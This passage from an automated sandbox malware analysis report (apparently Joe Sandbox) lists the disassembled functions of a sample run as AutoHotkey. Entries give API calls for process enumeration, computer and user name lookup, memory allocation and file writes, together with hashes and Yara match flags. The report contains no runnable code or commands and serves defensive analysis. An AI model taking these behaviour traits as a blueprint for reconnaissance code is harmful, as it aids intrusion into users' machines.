                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ChangeCloseFindNotification_free
                                      • String ID:
                                      • API String ID: 2993663561-0
                                      • Opcode ID: a5c98d2a72a08bb4ccc50ab5eb28ee9faa61bccaa725121493dc683ec331b5fa
                                      • Instruction ID: 41f877f1f6302fc59ff80e6d7ab69f071caa4bce07e8174407a26e36b7efb25f
                                      • Opcode Fuzzy Hash: a5c98d2a72a08bb4ccc50ab5eb28ee9faa61bccaa725121493dc683ec331b5fa
                                      • Instruction Fuzzy Hash: 95115BB1500B509BD721CF18D944B17B7E4FF89760F544A2EF4A6A7BD0D37CA8408B89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 048456BD Relevance: 3.0, APIs: 2, Instructions: 15memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SysFreeString.OLEAUT32 ref: 048455D7
                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 048456C8
                                      • SysFreeString.OLEAUT32(00000000), ref: 048456DA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$Free$Alloc
                                      • String ID:
                                      • API String ID: 986138563-0
                                      • Opcode ID: b9a0b81224fafffd09e26044de55a0ceaecf63f4a38d97008b2848704e85ee23
                                      • Instruction ID: fafa87e221fa3817ce880c300f9b5bb87bf9dec892468f913948addb48f545b4
                                      • Opcode Fuzzy Hash: b9a0b81224fafffd09e26044de55a0ceaecf63f4a38d97008b2848704e85ee23
                                      • Instruction Fuzzy Hash: 53C012FC21130E6EBB052F20492893E2769AECA7093500EA8B901C9200EB6AF681A421
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04842105 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,04842498), ref: 04842134
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,04842498), ref: 0484215B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 8a7da37ee1001678662bf6e54ccf2d9a5688fd72c548148c257b6ec02dccd5d1
                                      • Instruction ID: ebf4e3be997fff75973351d0c5e5328eddc468a7021601c82b17e7c60dca3577
                                      • Opcode Fuzzy Hash: 8a7da37ee1001678662bf6e54ccf2d9a5688fd72c548148c257b6ec02dccd5d1
                                      • Instruction Fuzzy Hash: CFF0A7B2F0473467FB219AAD4C88B5755849FC5BD4F194AB0FB48EF3C8E6E1B84142A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00437070 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d54320ea828efed171509a536ee03f5f3d96f88e1580a83f15ab18b66478964d
                                      • Instruction ID: ca01143739f2e02c276dad3e3a4ee545a9beb865deba4d63e52cbaf9d05922f1
                                      • Opcode Fuzzy Hash: d54320ea828efed171509a536ee03f5f3d96f88e1580a83f15ab18b66478964d
                                      • Instruction Fuzzy Hash: B341EDB26092019BDB24CF14EC84B6677A5EB8D324F24915FE4C14B391C739DC41C76A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04872089 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetComputerNameW.KERNEL32(?,00000011), ref: 048720C3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ComputerName
                                      • String ID:
                                      • API String ID: 3545744682-0
                                      • Opcode ID: 9105ed1082fc36b86ee5aba64df5f263e3974dd8b25fcb8ec6c033e0c68ec016
                                      • Instruction ID: 7963c6f72b297346ca9b16b25629b65de464e7e923d7d7e5852f5c62002136f1
                                      • Opcode Fuzzy Hash: 9105ed1082fc36b86ee5aba64df5f263e3974dd8b25fcb8ec6c033e0c68ec016
                                      • Instruction Fuzzy Hash: 6D012131A0420C9BEB05EBA9D8609DDB3B9EB8C314B518A75D511E2650FA74F5048A62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047D6D0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0047D6DD
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_malloc
                                      • String ID:
                                      • API String ID: 501242067-0
                                      • Opcode ID: 744d596e89a22072067e06abad0c6876cdad1b58dfed09ae2c14f2e5ea897def
                                      • Instruction ID: d3138546fd639746f6f0914a22fb511e5ca1f9358f16b7c35768eb7a5998e34b
                                      • Opcode Fuzzy Hash: 744d596e89a22072067e06abad0c6876cdad1b58dfed09ae2c14f2e5ea897def
                                      • Instruction Fuzzy Hash: 52F05E71A10A028FDBA4CB39D894B2BB3E6BFD4314B14862ED44EC3B45E734F841CA48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047D030 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0049A782: _malloc.LIBCMT ref: 0049A79C
                                      • _malloc.LIBCMT ref: 0047D04D
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _malloc$AllocateHeap
                                      • String ID:
                                      • API String ID: 680241177-0
                                      • Opcode ID: 663d1d11b724a3ed6e87d9bc3ea8fdacfbe1ca0db763c36514e86865a39b6252
                                      • Instruction ID: b79e1b1c2edb02dd2ace68102601568de1439367354d57c28c176dc2c7eed686
                                      • Opcode Fuzzy Hash: 663d1d11b724a3ed6e87d9bc3ea8fdacfbe1ca0db763c36514e86865a39b6252
                                      • Instruction Fuzzy Hash: B6E06DB19026214AD761AF65BC0A3837BE0AF10758F04843BF8C996301E6BCD99587CB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0487202D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: 7ed426666fdfabaec96553ad2da44dc8ed81b41b05e2f9006b86400a1667c5d5
                                      • Instruction ID: 5ac68dc529ae955dc0d0465b6aae8d1d3f9301f28c33f5abf22a0b66d77a5979
                                      • Opcode Fuzzy Hash: 7ed426666fdfabaec96553ad2da44dc8ed81b41b05e2f9006b86400a1667c5d5
                                      • Instruction Fuzzy Hash: D5E0ED7130420867E700FA68DC9499E72999BC4708F005E3969CACB281EAFAFD849663
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 048464A1 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 048464BF
                                        • Part of subcall function 04846735: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 04846750
                                        • Part of subcall function 04846735: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0484676E
                                        • Part of subcall function 04846735: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0484678C
                                        • Part of subcall function 04846735: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 048467AA
                                        • Part of subcall function 04846735: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,04846839,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 048467F3
                                        • Part of subcall function 04846735: RegQueryValueExA.ADVAPI32(?,048469B5,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,04846839,?,80000001), ref: 04846811
                                        • Part of subcall function 04846735: RegCloseKey.ADVAPI32(?,04846840,00000000,00000000,00000005,00000000,04846839,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04846833
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$FileModuleNameQueryValue$Close
                                      • String ID:
                                      • API String ID: 2796650324-0
                                      • Opcode ID: aca5e066b41eed28f3f5e6cb050fd2c26d221325605f938b2c0a29fe1b907219
                                      • Instruction ID: b3249c435154e8de45e96210de95bca6d9a1e0c32d44289c8e3fbb931df29352
                                      • Opcode Fuzzy Hash: aca5e066b41eed28f3f5e6cb050fd2c26d221325605f938b2c0a29fe1b907219
                                      • Instruction Fuzzy Hash: ECE06DB1A002288FDB10DE5C88C4B4237D8AB48754F004A91AC58DF24AE3B5E95087D1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04848BF1 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffA.USER32(00000000,00000000,?,00000000,00000000,0487C718,00000000,0487C758), ref: 04848C1B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BuffCharLower
                                      • String ID:
                                      • API String ID: 2358735015-0
                                      • Opcode ID: a5d63da8c5b4bf74d6e91533128ac9c5a89ef7081f6d684566daabab1f11077a
                                      • Instruction ID: 11cab9292976ff5ece594476c24b0840a4ecd54d9ba708100b593b2c2a80ed27
                                      • Opcode Fuzzy Hash: a5d63da8c5b4bf74d6e91533128ac9c5a89ef7081f6d684566daabab1f11077a
                                      • Instruction Fuzzy Hash: 3BD05EA17012292B2240B9BE1CC0A5EC2CD8FD94693150E36F608C7310EF94EC0602A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0485BBA9 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0485B92D: GetModuleHandleA.KERNEL32(kernel32.dll,0000000F,0485BBB4,?,?,048742C9,00000000,048743A7,?,?,?,?,?,0485BCFA,00000000,0485C1F0), ref: 0485B941
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0485B959
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0485B96B
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0485B97D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0485B98F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0485B9A1
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0485B9B3
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0485B9C5
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0485B9D7
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0485B9E9
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0485B9FB
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0485BA0D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0485BA1F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0485BA31
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0485BA43
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0485BA55
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0485BA67
                                      • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0485BBBA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 2242398760-0
                                      • Opcode ID: e70f2cb6fc2998d303dcb753be0a6d103cfe106339275afcf3ca8729155b2e43
                                      • Instruction ID: 1ead506edbebb2eb31569b636243467c47df9fe8218fac6b297b2ddb74000f22
                                      • Opcode Fuzzy Hash: e70f2cb6fc2998d303dcb753be0a6d103cfe106339275afcf3ca8729155b2e43
                                      • Instruction Fuzzy Hash: 00C08092A01121175E1065FD7C84CD3974CCDC50B63040D62B905D3111E2F99C1091A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0485BBC9 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0485B92D: GetModuleHandleA.KERNEL32(kernel32.dll,0000000F,0485BBB4,?,?,048742C9,00000000,048743A7,?,?,?,?,?,0485BCFA,00000000,0485C1F0), ref: 0485B941
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0485B959
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0485B96B
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0485B97D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0485B98F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0485B9A1
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0485B9B3
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0485B9C5
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0485B9D7
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0485B9E9
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0485B9FB
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0485BA0D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0485BA1F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0485BA31
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0485BA43
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0485BA55
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0485BA67
                                      • Process32First.KERNEL32(?,00000128), ref: 0485BBDA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$FirstHandleModuleProcess32
                                      • String ID:
                                      • API String ID: 2774106396-0
                                      • Opcode ID: 1c327ee816d43d967800f9eba1689b28ffc3b4a1c0ec697c8c5bb44fc0db80f8
                                      • Instruction ID: edd442dc1d61911ee2662ffb47a610db504ceab50f08e980de23d402722686b5
                                      • Opcode Fuzzy Hash: 1c327ee816d43d967800f9eba1689b28ffc3b4a1c0ec697c8c5bb44fc0db80f8
                                      • Instruction Fuzzy Hash: E1C080D2702130179F1075F87C848D3974CCD450B73140E62F905D3121E2BDAC119190
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0485BBE9 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0485B92D: GetModuleHandleA.KERNEL32(kernel32.dll,0000000F,0485BBB4,?,?,048742C9,00000000,048743A7,?,?,?,?,?,0485BCFA,00000000,0485C1F0), ref: 0485B941
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0485B959
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0485B96B
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0485B97D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0485B98F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0485B9A1
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0485B9B3
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0485B9C5
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0485B9D7
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0485B9E9
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0485B9FB
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0485BA0D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0485BA1F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0485BA31
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0485BA43
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0485BA55
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0485BA67
                                      • Process32Next.KERNEL32(?,00000128), ref: 0485BBFA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModuleNextProcess32
                                      • String ID:
                                      • API String ID: 2237597116-0
                                      • Opcode ID: 9772b48aa848a77e8a74ef99842b3ebcf776504417bb2148da5c854e9d8a6f59
                                      • Instruction ID: 447c693fd48db06537cd97f43d8923c5d456c41880814a9f25f9fb697468ab28
                                      • Opcode Fuzzy Hash: 9772b48aa848a77e8a74ef99842b3ebcf776504417bb2148da5c854e9d8a6f59
                                      • Instruction Fuzzy Hash: 59C080D2612534176E1065F87C844D7874CCD891B73140DA2B905D3111E65D9C119190
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 048759C9 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesA.KERNEL32(00000000,?,04875A37,00000000,04875A4F,?,?,?,?,04875A8D,00000000,04875AA5,?,?), ref: 048759D4
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 4bff137de83b8da908ac2e645cc3fa487c90a569a2b7e9bb4e3bb2d98164668f
                                      • Instruction ID: 5a3591a9c385c4e2b4093360273e8c7314a5bb91c567a721b0bf7c787aa674b6
                                      • Opcode Fuzzy Hash: 4bff137de83b8da908ac2e645cc3fa487c90a569a2b7e9bb4e3bb2d98164668f
                                      • Instruction Fuzzy Hash: E0C08CE2206204276F1069BC3CE928A028849851393341F26F068C69F2F362F4272011
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 048422A9 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 04842342
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 862a36a0d576227c065ec1202f17d487326ccd546f91bfc3d07402c75df67cff
                                      • Instruction ID: 1c70ab5028804c8cbf62bb7a77e1c3e782eb90b1185cccf94821a967a31c875b
                                      • Opcode Fuzzy Hash: 862a36a0d576227c065ec1202f17d487326ccd546f91bfc3d07402c75df67cff
                                      • Instruction Fuzzy Hash: 6021AFB560824A9FD750CF2CC884A5AB7F4FF88354F148E69F999CB354E330E9548B52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04874295 Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0485BBA9: CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0485BBBA
                                        • Part of subcall function 0485BBC9: Process32First.KERNEL32(?,00000128), ref: 0485BBDA
                                      • CloseHandle.KERNEL32(?,0487437B), ref: 0487436E
                                        • Part of subcall function 0485BBE9: Process32Next.KERNEL32(?,00000128), ref: 0485BBFA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 0aad118bd18f981ccd2805f6fe58247a85df27860aec1da068bb4c20370f6f04
                                      • Instruction ID: 298f28678f0f1770c56ccad6ffc1469c623700846c607f38bd70ea92f9c43baa
                                      • Opcode Fuzzy Hash: 0aad118bd18f981ccd2805f6fe58247a85df27860aec1da068bb4c20370f6f04
                                      • Instruction Fuzzy Hash: 9A215470A04709AFEB11DF69CC60DDDBBB9EB89B08F4189B5E808D2650E774BA50DD11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04842369 Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualFree.KERNEL32(?,?,00004000), ref: 048423F9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 11b8bfe42085adfea4406494577bbd31a3c7dc506881e4582e95ebb417fc903d
                                      • Instruction ID: 724c32e1bff75534dca8bab3a1e10e0be8257da654d6bbdadc6f1b204fafa5c2
                                      • Opcode Fuzzy Hash: 11b8bfe42085adfea4406494577bbd31a3c7dc506881e4582e95ebb417fc903d
                                      • Instruction Fuzzy Hash: C921CEB5608206DFD750CF2CD884A2AB7F0FF99354B104EA8F594DB314E330E9998B52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04874631 Relevance: 1.3, APIs: 1, Instructions: 39sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0487459D: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621,?,?,?,00000001), ref: 048745E2
                                        • Part of subcall function 0487459D: WriteFile.KERNEL32(00000000,?,00000000,048746A2,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621), ref: 048745FA
                                        • Part of subcall function 0487459D: CloseHandle.KERNEL32(00000000,00000000,?,00000000,048746A2,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621), ref: 04874606
